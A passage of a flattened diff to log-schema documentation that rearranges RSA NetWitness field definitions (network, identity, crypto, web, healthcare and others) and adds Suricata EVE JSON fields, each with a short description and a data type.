isnt ad.computer. + type: keyword -- -*`rsa.misc.cn_min_ttl`*:: +*`rsa.network.domain`*:: + -- type: keyword -- -*`rsa.misc.cn_minpcktlen`*:: +*`rsa.network.host_dst`*:: + -- +This key should only be used when it’s a Destination Hostname + type: keyword -- -*`rsa.misc.cn_mpls_lbl_1`*:: +*`rsa.network.network_service`*:: + -- +This is used to capture layer 7 protocols/service names + type: keyword -- -*`rsa.misc.cn_mpls_lbl_10`*:: +*`rsa.network.interface`*:: + -- +This key should be used when the source or destination context of an interface is not clear + type: keyword -- -*`rsa.misc.cn_mpls_lbl_2`*:: +*`rsa.network.network_port`*:: + -- -type: keyword +Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) + +type: long -- -*`rsa.misc.cn_mpls_lbl_3`*:: +*`rsa.network.eth_host`*:: + -- +Deprecated, use alias.mac + type: keyword -- -*`rsa.misc.cn_mpls_lbl_4`*:: +*`rsa.network.sinterface`*:: + -- +This key should only be used when it’s a Source Interface + type: keyword -- -*`rsa.misc.cn_mpls_lbl_5`*:: +*`rsa.network.dinterface`*:: + -- +This key should only be used when it’s a Destination Interface + type: keyword -- -*`rsa.misc.cn_mpls_lbl_6`*:: +*`rsa.network.vlan`*:: + -- -type: keyword +This key should only be used to capture the ID of the Virtual LAN + +type: long -- -*`rsa.misc.cn_mpls_lbl_7`*:: +*`rsa.network.zone_src`*:: + -- +This key should only be used when it’s a Source Zone. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_8`*:: +*`rsa.network.zone`*:: + -- +This key should be used when the source or destination context of a Zone is not clear + type: keyword -- -*`rsa.misc.cn_mpls_lbl_9`*:: +*`rsa.network.zone_dst`*:: + -- +This key should only be used when it’s a Destination Zone. + type: keyword -- -*`rsa.misc.cn_mplstoplabel`*:: +*`rsa.network.gateway`*:: + -- +This key is used to capture the IP Address of the gateway + type: keyword -- -*`rsa.misc.cn_mplstoplabip`*:: +*`rsa.network.icmp_type`*:: + -- -type: keyword +This key is used to capture the ICMP type only + +type: long -- -*`rsa.misc.cn_mul_dst_byt`*:: +*`rsa.network.mask`*:: + -- +This key is used to capture the device network IPmask. + type: keyword -- -*`rsa.misc.cn_mul_dst_pks`*:: +*`rsa.network.icmp_code`*:: + -- -type: keyword +This key is used to capture the ICMP code only + +type: long -- -*`rsa.misc.cn_muligmptype`*:: +*`rsa.network.protocol_detail`*:: + -- +This key should be used to capture additional protocol information + type: keyword -- -*`rsa.misc.cn_sampalgo`*:: +*`rsa.network.dmask`*:: + -- +This key is used for Destionation Device network mask + type: keyword -- -*`rsa.misc.cn_sampint`*:: +*`rsa.network.port`*:: + -- -type: keyword +This key should only be used to capture a Network Port when the directionality is not clear + +type: long -- -*`rsa.misc.cn_seqctr`*:: +*`rsa.network.smask`*:: + -- +This key is used for capturing source Network Mask + type: keyword -- -*`rsa.misc.cn_spackets`*:: +*`rsa.network.netname`*:: + -- +This key is used to capture the network name associated with an IP range. This is configured by the end user. + type: keyword -- -*`rsa.misc.cn_src_tos`*:: +*`rsa.network.paddr`*:: + -- -type: keyword +Deprecated + +type: ip -- -*`rsa.misc.cn_src_vlan`*:: +*`rsa.network.faddr`*:: + -- type: keyword -- -*`rsa.misc.cn_sysuptime`*:: +*`rsa.network.lhost`*:: + -- type: keyword -- -*`rsa.misc.cn_template_id`*:: +*`rsa.network.origin`*:: + -- type: keyword -- -*`rsa.misc.cn_totbytsexp`*:: +*`rsa.network.remote_domain_id`*:: + -- type: keyword -- -*`rsa.misc.cn_totflowexp`*:: +*`rsa.network.addr`*:: + -- type: keyword -- -*`rsa.misc.cn_totpcktsexp`*:: +*`rsa.network.dns_a_record`*:: + -- type: keyword -- -*`rsa.misc.cn_unixnanosecs`*:: +*`rsa.network.dns_ptr_record`*:: + -- type: keyword -- -*`rsa.misc.cn_v6flowlabel`*:: +*`rsa.network.fhost`*:: + -- type: keyword -- -*`rsa.misc.cn_v6optheaders`*:: +*`rsa.network.fport`*:: + -- type: keyword -- -*`rsa.misc.comp_class`*:: +*`rsa.network.laddr`*:: + -- type: keyword -- -*`rsa.misc.comp_name`*:: +*`rsa.network.linterface`*:: + -- type: keyword -- -*`rsa.misc.comp_rbytes`*:: +*`rsa.network.phost`*:: + -- type: keyword -- -*`rsa.misc.comp_sbytes`*:: +*`rsa.network.ad_computer_dst`*:: + -- +Deprecated, use host.dst + type: keyword -- -*`rsa.misc.cpu_data`*:: +*`rsa.network.eth_type`*:: + -- -type: keyword +This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only + +type: long -- -*`rsa.misc.criticality`*:: +*`rsa.network.ip_proto`*:: + -- -type: keyword +This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI + +type: long -- -*`rsa.misc.cs_agency_dst`*:: +*`rsa.network.dns_cname_record`*:: + -- type: keyword -- -*`rsa.misc.cs_analyzedby`*:: +*`rsa.network.dns_id`*:: + -- type: keyword -- -*`rsa.misc.cs_av_other`*:: +*`rsa.network.dns_opcode`*:: + -- type: keyword -- -*`rsa.misc.cs_av_primary`*:: +*`rsa.network.dns_resp`*:: + -- type: keyword -- -*`rsa.misc.cs_av_secondary`*:: +*`rsa.network.dns_type`*:: + -- type: keyword -- -*`rsa.misc.cs_bgpv6nxthop`*:: +*`rsa.network.domain1`*:: + -- type: keyword -- -*`rsa.misc.cs_bit9status`*:: +*`rsa.network.host_type`*:: + -- type: keyword -- -*`rsa.misc.cs_context`*:: +*`rsa.network.packet_length`*:: + -- type: keyword -- -*`rsa.misc.cs_control`*:: +*`rsa.network.host_orig`*:: + -- +This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. + type: keyword -- -*`rsa.misc.cs_data`*:: +*`rsa.network.rpayload`*:: + -- +This key is used to capture the total number of payload bytes seen in the retransmitted packets. + type: keyword -- -*`rsa.misc.cs_datecret`*:: +*`rsa.network.vlan_name`*:: + -- +This key should only be used to capture the name of the Virtual LAN + type: keyword -- -*`rsa.misc.cs_dst_tld`*:: + +*`rsa.investigations.ec_activity`*:: + -- +This key captures the particular event activity(Ex:Logoff) + type: keyword -- -*`rsa.misc.cs_eth_dst_ven`*:: +*`rsa.investigations.ec_theme`*:: + -- +This key captures the Theme of a particular Event(Ex:Authentication) + type: keyword -- -*`rsa.misc.cs_eth_src_ven`*:: +*`rsa.investigations.ec_subject`*:: + -- +This key captures the Subject of a particular Event(Ex:User) + type: keyword -- -*`rsa.misc.cs_event_uuid`*:: +*`rsa.investigations.ec_outcome`*:: + -- +This key captures the outcome of a particular Event(Ex:Success) + type: keyword -- -*`rsa.misc.cs_filetype`*:: +*`rsa.investigations.event_cat`*:: + -- -type: keyword +This key captures the Event category number + +type: long -- -*`rsa.misc.cs_fld`*:: +*`rsa.investigations.event_cat_name`*:: + -- +This key captures the event category name corresponding to the event cat code + type: keyword -- -*`rsa.misc.cs_if_desc`*:: +*`rsa.investigations.event_vcat`*:: + -- +This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. + type: keyword -- -*`rsa.misc.cs_if_name`*:: +*`rsa.investigations.analysis_file`*:: + -- +This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file + type: keyword -- -*`rsa.misc.cs_ip_next_hop`*:: +*`rsa.investigations.analysis_service`*:: + -- +This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service + type: keyword -- -*`rsa.misc.cs_ipv4dstpre`*:: +*`rsa.investigations.analysis_session`*:: + -- +This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session + type: keyword -- -*`rsa.misc.cs_ipv4srcpre`*:: +*`rsa.investigations.boc`*:: + -- +This is used to capture behaviour of compromise + type: keyword -- -*`rsa.misc.cs_lifetime`*:: +*`rsa.investigations.eoc`*:: + -- +This is used to capture Enablers of Compromise + type: keyword -- -*`rsa.misc.cs_log_medium`*:: +*`rsa.investigations.inv_category`*:: + -- +This used to capture investigation category + type: keyword -- -*`rsa.misc.cs_loginname`*:: +*`rsa.investigations.inv_context`*:: + -- +This used to capture investigation context + type: keyword -- -*`rsa.misc.cs_modulescore`*:: +*`rsa.investigations.ioc`*:: + -- +This is key capture indicator of compromise + type: keyword -- -*`rsa.misc.cs_modulesign`*:: + +*`rsa.counters.dclass_c1`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c1.str only + +type: long -- -*`rsa.misc.cs_opswatresult`*:: +*`rsa.counters.dclass_c2`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c2.str only + +type: long -- -*`rsa.misc.cs_payload`*:: +*`rsa.counters.event_counter`*:: + -- -type: keyword +This is used to capture the number of times an event repeated + +type: long -- -*`rsa.misc.cs_registrant`*:: +*`rsa.counters.dclass_r1`*:: + -- +This is a generic ratio key that should be used with the label dclass.r1.str only + type: keyword -- -*`rsa.misc.cs_registrar`*:: +*`rsa.counters.dclass_c3`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c3.str only + +type: long -- -*`rsa.misc.cs_represult`*:: +*`rsa.counters.dclass_c1_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c1 only + type: keyword -- -*`rsa.misc.cs_rpayload`*:: +*`rsa.counters.dclass_c2_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c2 only + type: keyword -- -*`rsa.misc.cs_sampler_name`*:: +*`rsa.counters.dclass_r1_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r1 only + type: keyword -- -*`rsa.misc.cs_sourcemodule`*:: +*`rsa.counters.dclass_r2`*:: + -- +This is a generic ratio key that should be used with the label dclass.r2.str only + type: keyword -- -*`rsa.misc.cs_streams`*:: +*`rsa.counters.dclass_c3_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c3 only + type: keyword -- -*`rsa.misc.cs_targetmodule`*:: +*`rsa.counters.dclass_r3`*:: + -- +This is a generic ratio key that should be used with the label dclass.r3.str only + type: keyword -- -*`rsa.misc.cs_v6nxthop`*:: +*`rsa.counters.dclass_r2_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r2 only + type: keyword -- -*`rsa.misc.cs_whois_server`*:: +*`rsa.counters.dclass_r3_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r3 only + type: keyword -- -*`rsa.misc.cs_yararesult`*:: + +*`rsa.identity.auth_method`*:: + -- +This key is used to capture authentication methods used only + type: keyword -- -*`rsa.misc.description`*:: +*`rsa.identity.user_role`*:: + -- +This key is used to capture the Role of a user only + type: keyword -- -*`rsa.misc.devvendor`*:: +*`rsa.identity.dn`*:: + -- +X.500 (LDAP) Distinguished Name + type: keyword -- -*`rsa.misc.distance`*:: +*`rsa.identity.logon_type`*:: + -- +This key is used to capture the type of logon method used. + type: keyword -- -*`rsa.misc.dstburb`*:: +*`rsa.identity.profile`*:: + -- +This key is used to capture the user profile + type: keyword -- -*`rsa.misc.edomain`*:: +*`rsa.identity.accesses`*:: + -- +This key is used to capture actual privileges used in accessing an object + type: keyword -- -*`rsa.misc.edomaub`*:: +*`rsa.identity.realm`*:: + -- +Radius realm or similar grouping of accounts + type: keyword -- -*`rsa.misc.euid`*:: +*`rsa.identity.user_sid_dst`*:: + -- +This key captures Destination User Session ID + type: keyword -- -*`rsa.misc.facility`*:: +*`rsa.identity.dn_src`*:: + -- +An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn + type: keyword -- -*`rsa.misc.finterface`*:: +*`rsa.identity.org`*:: + -- +This key captures the User organization + type: keyword -- -*`rsa.misc.flags`*:: +*`rsa.identity.dn_dst`*:: + -- +An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn + type: keyword -- -*`rsa.misc.gaddr`*:: +*`rsa.identity.firstname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.id3`*:: +*`rsa.identity.lastname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.im_buddyname`*:: +*`rsa.identity.user_dept`*:: + -- +User's Department Names only + type: keyword -- -*`rsa.misc.im_croomid`*:: +*`rsa.identity.user_sid_src`*:: + -- +This key captures Source User Session ID + type: keyword -- -*`rsa.misc.im_croomtype`*:: +*`rsa.identity.federated_sp`*:: + -- +This key is the Federated Service Provider. This is the application requesting authentication. + type: keyword -- -*`rsa.misc.im_members`*:: +*`rsa.identity.federated_idp`*:: + -- +This key is the federated Identity Provider. This is the server providing the authentication. + type: keyword -- -*`rsa.misc.im_username`*:: +*`rsa.identity.logon_type_desc`*:: + -- +This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. + type: keyword -- -*`rsa.misc.ipkt`*:: +*`rsa.identity.middlename`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.ipscat`*:: +*`rsa.identity.password`*:: + -- +This key is for Passwords seen in any session, plain text or encrypted + type: keyword -- -*`rsa.misc.ipspri`*:: +*`rsa.identity.host_role`*:: + -- +This key should only be used to capture the role of a Host Machine + type: keyword -- -*`rsa.misc.latitude`*:: +*`rsa.identity.ldap`*:: + -- +This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context + type: keyword -- -*`rsa.misc.linenum`*:: +*`rsa.identity.ldap_query`*:: + -- +This key is the Search criteria from an LDAP search + type: keyword -- -*`rsa.misc.list_name`*:: +*`rsa.identity.ldap_response`*:: + -- +This key is to capture Results from an LDAP search + type: keyword -- -*`rsa.misc.load_data`*:: +*`rsa.identity.owner`*:: + -- +This is used to capture username the process or service is running as, the author of the task + type: keyword -- -*`rsa.misc.location_floor`*:: +*`rsa.identity.service_account`*:: + -- +This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage + type: keyword -- -*`rsa.misc.location_mark`*:: + +*`rsa.email.email_dst`*:: + -- +This key is used to capture the Destination email address only, when the destination context is not clear use email + type: keyword -- -*`rsa.misc.log_id`*:: +*`rsa.email.email_src`*:: + -- +This key is used to capture the source email address only, when the source context is not clear use email + type: keyword -- -*`rsa.misc.log_type`*:: +*`rsa.email.subject`*:: + -- +This key is used to capture the subject string from an Email only. + type: keyword -- -*`rsa.misc.logid`*:: +*`rsa.email.email`*:: + -- +This key is used to capture a generic email address where the source or destination context is not clear + type: keyword -- -*`rsa.misc.logip`*:: +*`rsa.email.trans_from`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.logname`*:: +*`rsa.email.trans_to`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.longitude`*:: + +*`rsa.file.privilege`*:: + -- +Deprecated, use permissions + type: keyword -- -*`rsa.misc.lport`*:: +*`rsa.file.attachment`*:: + -- +This key captures the attachment file name + type: keyword -- -*`rsa.misc.mbug_data`*:: +*`rsa.file.filesystem`*:: + -- type: keyword -- -*`rsa.misc.misc_name`*:: +*`rsa.file.binary`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.msg_type`*:: +*`rsa.file.filename_dst`*:: + -- +This is used to capture name of the file targeted by the action + type: keyword -- -*`rsa.misc.msgid`*:: +*`rsa.file.filename_src`*:: + -- +This is used to capture name of the parent filename, the file which performed the action + type: keyword -- -*`rsa.misc.netsessid`*:: +*`rsa.file.filename_tmp`*:: + -- type: keyword -- -*`rsa.misc.num`*:: +*`rsa.file.directory_dst`*:: + -- +This key is used to capture the directory of the target process or file + type: keyword -- -*`rsa.misc.number1`*:: +*`rsa.file.directory_src`*:: + -- +This key is used to capture the directory of the source process or file + type: keyword -- -*`rsa.misc.number2`*:: +*`rsa.file.file_entropy`*:: + -- -type: keyword +This is used to capture entropy vale of a file + +type: double -- -*`rsa.misc.nwwn`*:: +*`rsa.file.file_vendor`*:: + -- +This is used to capture Company name of file located in version_info + type: keyword -- -*`rsa.misc.object`*:: +*`rsa.file.task_name`*:: + -- +This is used to capture name of the task + type: keyword -- -*`rsa.misc.operation`*:: + +*`rsa.web.fqdn`*:: + -- +Fully Qualified Domain Names + type: keyword -- -*`rsa.misc.opkt`*:: +*`rsa.web.web_cookie`*:: + -- +This key is used to capture the Web cookies specifically. + type: keyword -- -*`rsa.misc.orig_from`*:: +*`rsa.web.alias_host`*:: + -- type: keyword -- -*`rsa.misc.owner_id`*:: +*`rsa.web.reputation_num`*:: + -- -type: keyword +Reputation Number of an entity. Typically used for Web Domains + +type: double -- -*`rsa.misc.p_action`*:: +*`rsa.web.web_ref_domain`*:: + -- +Web referer's domain + type: keyword -- -*`rsa.misc.p_filter`*:: +*`rsa.web.web_ref_query`*:: + -- +This key captures Web referer's query portion of the URL + type: keyword -- -*`rsa.misc.p_group_object`*:: +*`rsa.web.remote_domain`*:: + -- type: keyword -- -*`rsa.misc.p_id`*:: +*`rsa.web.web_ref_page`*:: + -- +This key captures Web referer's page information + type: keyword -- -*`rsa.misc.p_msgid1`*:: +*`rsa.web.web_ref_root`*:: + -- +Web referer's root URL path + type: keyword -- -*`rsa.misc.p_msgid2`*:: +*`rsa.web.cn_asn_dst`*:: + -- type: keyword -- -*`rsa.misc.p_result1`*:: +*`rsa.web.cn_rpackets`*:: + -- type: keyword -- -*`rsa.misc.password_chg`*:: +*`rsa.web.urlpage`*:: + -- type: keyword -- -*`rsa.misc.password_expire`*:: +*`rsa.web.urlroot`*:: + -- type: keyword -- -*`rsa.misc.permgranted`*:: +*`rsa.web.p_url`*:: + -- type: keyword -- -*`rsa.misc.permwanted`*:: +*`rsa.web.p_user_agent`*:: + -- type: keyword -- -*`rsa.misc.pgid`*:: +*`rsa.web.p_web_cookie`*:: + -- type: keyword -- -*`rsa.misc.policyUUID`*:: +*`rsa.web.p_web_method`*:: + -- type: keyword -- -*`rsa.misc.prog_asp_num`*:: +*`rsa.web.p_web_referer`*:: + -- type: keyword -- -*`rsa.misc.program`*:: +*`rsa.web.web_extension_tmp`*:: + -- type: keyword -- -*`rsa.misc.real_data`*:: +*`rsa.web.web_page`*:: + -- type: keyword -- -*`rsa.misc.rec_asp_device`*:: + +*`rsa.threat.threat_category`*:: + -- +This key captures Threat Name/Threat Category/Categorization of alert + type: keyword -- -*`rsa.misc.rec_asp_num`*:: +*`rsa.threat.threat_desc`*:: + -- +This key is used to capture the threat description from the session directly or inferred + type: keyword -- -*`rsa.misc.rec_library`*:: +*`rsa.threat.alert`*:: + -- +This key is used to capture name of the alert + type: keyword -- -*`rsa.misc.recordnum`*:: +*`rsa.threat.threat_source`*:: + -- +This key is used to capture source of the threat + type: keyword -- -*`rsa.misc.ruid`*:: + +*`rsa.crypto.crypto`*:: + -- +This key is used to capture the Encryption Type or Encryption Key only + type: keyword -- -*`rsa.misc.sburb`*:: +*`rsa.crypto.cipher_src`*:: + -- +This key is for Source (Client) Cipher + type: keyword -- -*`rsa.misc.sdomain_fld`*:: +*`rsa.crypto.cert_subject`*:: + -- +This key is used to capture the Certificate organization only + type: keyword -- -*`rsa.misc.sec`*:: +*`rsa.crypto.peer`*:: + -- +This key is for Encryption peer's IP Address + type: keyword -- -*`rsa.misc.sensorname`*:: +*`rsa.crypto.cipher_size_src`*:: + -- -type: keyword +This key captures Source (Client) Cipher Size + +type: long -- -*`rsa.misc.seqnum`*:: +*`rsa.crypto.ike`*:: + -- +IKE negotiation phase. + type: keyword -- -*`rsa.misc.session`*:: +*`rsa.crypto.scheme`*:: + -- +This key captures the Encryption scheme used + type: keyword -- -*`rsa.misc.sessiontype`*:: +*`rsa.crypto.peer_id`*:: + -- +This key is for Encryption peer’s identity + type: keyword -- -*`rsa.misc.sigUUID`*:: +*`rsa.crypto.sig_type`*:: + -- +This key captures the Signature Type + type: keyword -- -*`rsa.misc.spi`*:: +*`rsa.crypto.cert_issuer`*:: + -- type: keyword -- -*`rsa.misc.srcburb`*:: +*`rsa.crypto.cert_host_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.srcdom`*:: +*`rsa.crypto.cert_error`*:: + -- +This key captures the Certificate Error String + type: keyword -- -*`rsa.misc.srcservice`*:: +*`rsa.crypto.cipher_dst`*:: + -- +This key is for Destination (Server) Cipher + type: keyword -- -*`rsa.misc.state`*:: +*`rsa.crypto.cipher_size_dst`*:: + -- -type: keyword +This key captures Destination (Server) Cipher Size + +type: long -- -*`rsa.misc.status1`*:: +*`rsa.crypto.ssl_ver_src`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.svcno`*:: +*`rsa.crypto.d_certauth`*:: + -- type: keyword -- -*`rsa.misc.system`*:: +*`rsa.crypto.s_certauth`*:: + -- type: keyword -- -*`rsa.misc.tbdstr1`*:: +*`rsa.crypto.ike_cookie1`*:: + -- +ID of the negotiation — sent for ISAKMP Phase One + type: keyword -- -*`rsa.misc.tgtdom`*:: +*`rsa.crypto.ike_cookie2`*:: + -- +ID of the negotiation — sent for ISAKMP Phase Two + type: keyword -- -*`rsa.misc.tgtdomain`*:: +*`rsa.crypto.cert_checksum`*:: + -- type: keyword -- -*`rsa.misc.threshold`*:: +*`rsa.crypto.cert_host_cat`*:: + -- +This key is used for the hostname category value of a certificate + type: keyword -- -*`rsa.misc.type1`*:: +*`rsa.crypto.cert_serial`*:: + -- +This key is used to capture the Certificate serial number only + type: keyword -- -*`rsa.misc.udb_class`*:: +*`rsa.crypto.cert_status`*:: + -- +This key captures Certificate validation status + type: keyword -- -*`rsa.misc.url_fld`*:: +*`rsa.crypto.ssl_ver_dst`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.user_div`*:: +*`rsa.crypto.cert_keysize`*:: + -- type: keyword -- -*`rsa.misc.userid`*:: +*`rsa.crypto.cert_username`*:: + -- type: keyword -- -*`rsa.misc.username_fld`*:: +*`rsa.crypto.https_insact`*:: + -- type: keyword -- -*`rsa.misc.utcstamp`*:: +*`rsa.crypto.https_valid`*:: + -- type: keyword -- -*`rsa.misc.v_instafname`*:: +*`rsa.crypto.cert_ca`*:: + -- +This key is used to capture the Certificate signing authority only + type: keyword -- -*`rsa.misc.virt_data`*:: +*`rsa.crypto.cert_common`*:: + -- +This key is used to capture the Certificate common name only + type: keyword -- -*`rsa.misc.vpnid`*:: + +*`rsa.wireless.wlan_ssid`*:: + -- +This key is used to capture the ssid of a Wireless Session + type: keyword -- -*`rsa.misc.autorun_type`*:: +*`rsa.wireless.access_point`*:: + -- -This is used to capture Auto Run type +This key is used to capture the access point name. type: keyword -- -*`rsa.misc.cc_number`*:: +*`rsa.wireless.wlan_channel`*:: + -- -Valid Credit Card Numbers only +This is used to capture the channel names type: long -- -*`rsa.misc.content`*:: +*`rsa.wireless.wlan_name`*:: + -- -This key captures the content type from protocol headers +This key captures either WLAN number/name type: keyword -- -*`rsa.misc.ein_number`*:: + +*`rsa.storage.disk_volume`*:: + -- -Employee Identification Numbers only +A unique name assigned to logical units (volumes) within a physical disk -type: long +type: keyword -- -*`rsa.misc.found`*:: +*`rsa.storage.lun`*:: + -- -This is used to capture the results of regex match +Logical Unit Number.This key is a very useful concept in Storage. type: keyword -- -*`rsa.misc.language`*:: +*`rsa.storage.pwwn`*:: + -- -This is used to capture list of languages the client support and what it prefers +This uniquely identifies a port on a HBA. type: keyword -- -*`rsa.misc.lifetime`*:: + +*`rsa.physical.org_dst`*:: + -- -This key is used to capture the session lifetime in seconds. +This is used to capture the destination organization based on the GEOPIP Maxmind database. -type: long +type: keyword -- -*`rsa.misc.link`*:: +*`rsa.physical.org_src`*:: + -- -This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This is used to capture the source organization based on the GEOPIP Maxmind database. type: keyword -- -*`rsa.misc.match`*:: + +*`rsa.healthcare.patient_fname`*:: + -- -This key is for regex match name from search.ini +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information type: keyword -- -*`rsa.misc.param_dst`*:: +*`rsa.healthcare.patient_id`*:: + -- -This key captures the command line/launch argument of the target process or file +This key captures the unique ID for a patient type: keyword -- -*`rsa.misc.param_src`*:: +*`rsa.healthcare.patient_lname`*:: + -- -This key captures source parameter +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information type: keyword -- -*`rsa.misc.search_text`*:: +*`rsa.healthcare.patient_mname`*:: + -- -This key captures the Search Text used +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information type: keyword -- -*`rsa.misc.sig_name`*:: + +*`rsa.endpoint.host_state`*:: + -- -This key is used to capture the Signature Name only. +This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on type: keyword -- -*`rsa.misc.snmp_value`*:: +*`rsa.endpoint.registry_key`*:: + -- -SNMP set request value +This key captures the path to the registry key type: keyword -- -*`rsa.misc.streams`*:: +*`rsa.endpoint.registry_value`*:: + -- -This key captures number of streams in session +This key captures values or decorators used within a registry entry -type: long +type: keyword -- +[[exported-fields-suricata]] +== Suricata fields -*`rsa.db.index`*:: +Module for handling the EVE JSON logs produced by Suricata. + + + +[float] +=== suricata + +Fields from the Suricata EVE log file. + + + +[float] +=== eve + +Fields exported by the EVE JSON logs + + + +*`suricata.eve.event_type`*:: + -- -This key captures IndexID of the index. - type: keyword -- -*`rsa.db.instance`*:: +*`suricata.eve.app_proto_orig`*:: + -- -This key is used to capture the database server instance name - type: keyword -- -*`rsa.db.database`*:: + +*`suricata.eve.tcp.tcp_flags`*:: + -- -This key is used to capture the name of a database or an instance as seen in a session - type: keyword -- -*`rsa.db.transact_id`*:: +*`suricata.eve.tcp.psh`*:: + -- -This key captures the SQL transantion ID of the current session - -type: keyword +type: boolean -- -*`rsa.db.permissions`*:: +*`suricata.eve.tcp.tcp_flags_tc`*:: + -- -This key captures permission or privilege level assigned to a resource. - type: keyword -- -*`rsa.db.table_name`*:: +*`suricata.eve.tcp.ack`*:: + -- -This key is used to capture the table name - -type: keyword +type: boolean -- -*`rsa.db.db_id`*:: +*`suricata.eve.tcp.syn`*:: + -- -This key is used to capture the unique identifier for a database - -type: keyword +type: boolean -- -*`rsa.db.db_pid`*:: +*`suricata.eve.tcp.state`*:: + -- -This key captures the process id of a connection with database server - -type: long +type: keyword -- -*`rsa.db.lread`*:: +*`suricata.eve.tcp.tcp_flags_ts`*:: + -- -This key is used for the number of logical reads - -type: long +type: keyword -- -*`rsa.db.lwrite`*:: +*`suricata.eve.tcp.rst`*:: + -- -This key is used for the number of logical writes - -type: long +type: boolean -- -*`rsa.db.pread`*:: +*`suricata.eve.tcp.fin`*:: + -- -This key is used for the number of physical writes - -type: long +type: boolean -- -*`rsa.network.alias_host`*:: +*`suricata.eve.fileinfo.sha1`*:: + -- -This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. - type: keyword -- -*`rsa.network.domain`*:: +*`suricata.eve.fileinfo.filename`*:: + -- -type: keyword +type: alias + +alias to: file.path -- -*`rsa.network.host_dst`*:: +*`suricata.eve.fileinfo.tx_id`*:: + -- -This key should only be used when it’s a Destination Hostname - -type: keyword +type: long -- -*`rsa.network.network_service`*:: +*`suricata.eve.fileinfo.state`*:: + -- -This is used to capture layer 7 protocols/service names - type: keyword -- -*`rsa.network.interface`*:: +*`suricata.eve.fileinfo.stored`*:: + -- -This key should be used when the source or destination context of an interface is not clear - -type: keyword +type: boolean -- -*`rsa.network.network_port`*:: +*`suricata.eve.fileinfo.gaps`*:: + -- -Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) - -type: long +type: boolean -- -*`rsa.network.eth_host`*:: +*`suricata.eve.fileinfo.sha256`*:: + -- -Deprecated, use alias.mac - type: keyword -- -*`rsa.network.sinterface`*:: +*`suricata.eve.fileinfo.md5`*:: + -- -This key should only be used when it’s a Source Interface - type: keyword -- -*`rsa.network.dinterface`*:: +*`suricata.eve.fileinfo.size`*:: + -- -This key should only be used when it’s a Destination Interface +type: alias -type: keyword +alias to: file.size -- -*`rsa.network.vlan`*:: +*`suricata.eve.icmp_type`*:: + -- -This key should only be used to capture the ID of the Virtual LAN - type: long -- -*`rsa.network.zone_src`*:: +*`suricata.eve.dest_port`*:: + -- -This key should only be used when it’s a Source Zone. +type: alias -type: keyword +alias to: destination.port -- -*`rsa.network.zone`*:: +*`suricata.eve.src_port`*:: + -- -This key should be used when the source or destination context of a Zone is not clear +type: alias -type: keyword +alias to: source.port -- -*`rsa.network.zone_dst`*:: +*`suricata.eve.proto`*:: + -- -This key should only be used when it’s a Destination Zone. +type: alias -type: keyword +alias to: network.transport -- -*`rsa.network.gateway`*:: +*`suricata.eve.pcap_cnt`*:: + -- -This key is used to capture the IP Address of the gateway - -type: keyword +type: long -- -*`rsa.network.icmp_type`*:: +*`suricata.eve.src_ip`*:: + -- -This key is used to capture the ICMP type only +type: alias -type: long +alias to: source.ip -- -*`rsa.network.mask`*:: + +*`suricata.eve.dns.type`*:: + -- -This key is used to capture the device network IPmask. - type: keyword -- -*`rsa.network.icmp_code`*:: +*`suricata.eve.dns.rrtype`*:: + -- -This key is used to capture the ICMP code only - -type: long +type: keyword -- -*`rsa.network.protocol_detail`*:: +*`suricata.eve.dns.rrname`*:: + -- -This key should be used to capture additional protocol information - type: keyword -- -*`rsa.network.dmask`*:: +*`suricata.eve.dns.rdata`*:: + -- -This key is used for Destionation Device network mask - type: keyword -- -*`rsa.network.port`*:: +*`suricata.eve.dns.tx_id`*:: + -- -This key should only be used to capture a Network Port when the directionality is not clear - type: long -- -*`rsa.network.smask`*:: +*`suricata.eve.dns.ttl`*:: + -- -This key is used for capturing source Network Mask - -type: keyword +type: long -- -*`rsa.network.netname`*:: +*`suricata.eve.dns.rcode`*:: + -- -This key is used to capture the network name associated with an IP range. This is configured by the end user. - type: keyword -- -*`rsa.network.paddr`*:: 